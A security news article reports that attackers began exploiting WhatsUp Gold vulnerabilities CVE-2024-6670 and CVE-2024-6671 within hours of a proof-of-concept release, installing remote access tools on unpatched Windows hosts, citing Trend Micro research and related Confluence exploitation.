Malicious actors have been quick to exploit publicly available proof-of-concept (PoC) exploits for newly disclosed vulnerabilities in Progress Software's WhatsUp Gold. The attacks, which began on August 30, 2024, are targeting organizations that have yet to apply the necessary patches.
The initial wave of attacks kicked off just five hours after a PoC was released for CVE-2024-6670 (CVSS score: 9.8). This vulnerability was discovered by security researcher Sina Kheirkhah of the Summoning Team, who is also credited with identifying and reporting CVE-2024-6671 (also CVSS score: 9.8).
Both vulnerabilities allow unauthenticated attackers to retrieve a user’s encrypted password, and Progress Software patched these critical issues in mid-August 2024.
However, according to Trend Micro researchers Hitomi Kimura and Maria Emreen Viray, organizations that were slow to apply these patches have become targets of opportunistic attacks. “The timeline of events suggests that despite the availability of patches, some organizations were unable to apply them quickly, leading to incidents almost immediately following the PoC’s publication,” they said in a recent analysis.
The attacks appear to bypass WhatsUp Gold authentication, allowing malicious actors to exploit the Active Monitor PowerShell Script. By doing so, they are able to download and install various remote access tools, including Atera Agent, Radmin, SimpleHelp Remote Access, and Splashtop Remote, all of which help maintain persistence on compromised Windows hosts.
The attackers use an MSI installer file retrieved from a remote server to install Atera Agent and Splashtop Remote, among other tools.
Trend Micro researchers explained, "The polling process NmPoller.exe, the WhatsUp Gold executable, seems to be able to host a script called Active Monitor PowerShell Script as a legitimate function. The threat actors in this case chose it to perform remote arbitrary code execution."
Although no further malicious activities have been observed yet, the use of several remote access tools hints at the involvement of ransomware groups.
This marks the second time that WhatsUp Gold vulnerabilities have been actively exploited in the wild. Just last month, the Shadowserver Foundation observed attempts to exploit CVE-2024-4885 (CVSS score: 9.8), another critical flaw patched by Progress in June 2024.
This latest round of attacks follows the recent disclosure by Trend Micro that cybercriminals have been exploiting a now-patched security flaw in Atlassian Confluence Data Center and Confluence Server (CVE-2023-22527, CVSS score: 10.0). This vulnerability is being abused to deliver the Godzilla web shell, a major security risk for organizations worldwide.
September 14, 2024
September 14, 2024
September 14, 2024
© 2016 - 2025 Red Secure Tech Ltd. Registered in England and Wales under Company Number: 15581067
